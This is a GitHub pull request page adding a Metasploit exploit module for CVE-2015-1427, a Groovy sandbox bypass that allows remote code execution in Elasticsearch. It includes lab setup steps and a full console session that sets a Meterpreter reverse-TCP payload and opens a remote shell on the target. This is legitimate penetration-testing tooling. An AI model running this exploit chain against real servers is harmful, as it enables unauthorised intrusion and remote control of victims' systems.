New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add module for CVE-2015-1427, elasticsearch groovy code injection #4907

merged 8 commits into from Mar 12, 2015


None yet
3 participants

jvazquez-r7 commented Mar 10, 2015

This module adds a msf module for CVE-2015-1427, a RCE in elasticsearch due to the groovy sandbox bypass discovered recently. Also improves the old script_mvel_rce check to avoid false positives.

This module has been tested with Elastic 1.4.2 on Ubuntu 12.04 server (32 bits) and Windows.


  • Install Ubuntu 12.04 server (32 bits)
  • Install openjdk jdk 7: sudo apt-get install openjdk-7-jdk
  • Install Elastic search 1.4.2, it can be donwloaded from its homepage.
  • Execute elasticsearch `bin\elasticsearch'
  • Create one index
juan@ubuntu:~$ curl -XPUT 'http://localhost:9200/twitter/'
  • Add at least one document to the index
curl -XPUT 'http://localhost:9200/twitter/tweet/1' -d '{
> "user" : "kimchy",
> "post_date" : "2009-11-15T14:12:12",
> "message" : "trying out Elasticsearch"
> }'
  • Run the module, hopefully enjoy sessions
msf > use exploit/multi/elasticsearch/search_groovy_script
msf exploit(search_groovy_script) > set RHOST
msf exploit(search_groovy_script) > check
[+] - The target is vulnerable.
msf exploit(search_groovy_script) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(search_groovy_script) > set lhost
lhost =>
msf exploit(search_groovy_script) > rexploit
[*] Reloading module...

[*] Started reverse handler on
[*] - Checking vulnerability...
[*] - Discovering TEMP path...
[+] - TEMP path on '/tmp'
[*] - Discovering remote OS...
[+] - Remote OS is 'Linux'
[*] - Trying to load metasploit payload...
[*] Sending stage (30680 bytes) to
[+] Deleted /tmp/EmGWzsL.jar

meterpreter > getuid
sServer username: juan
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux 3.8.0-29-generic (i386)
Meterpreter : java/java
meterpreter >

This comment has been minimized.

carnal0wnage commented on 9e17874 Mar 11, 2015

<3 this


This comment has been minimized.


jvazquez-r7 commented Mar 11, 2015

Thanks @carnal0wnage :-) I'm glad you think it's useful!

@wchen-r7 wchen-r7 self-assigned this Mar 12, 2015

@wchen-r7 wchen-r7 merged commit 8a452a7 into rapid7:master Mar 12, 2015

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed

wchen-r7 added a commit that referenced this pull request Mar 12, 2015

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment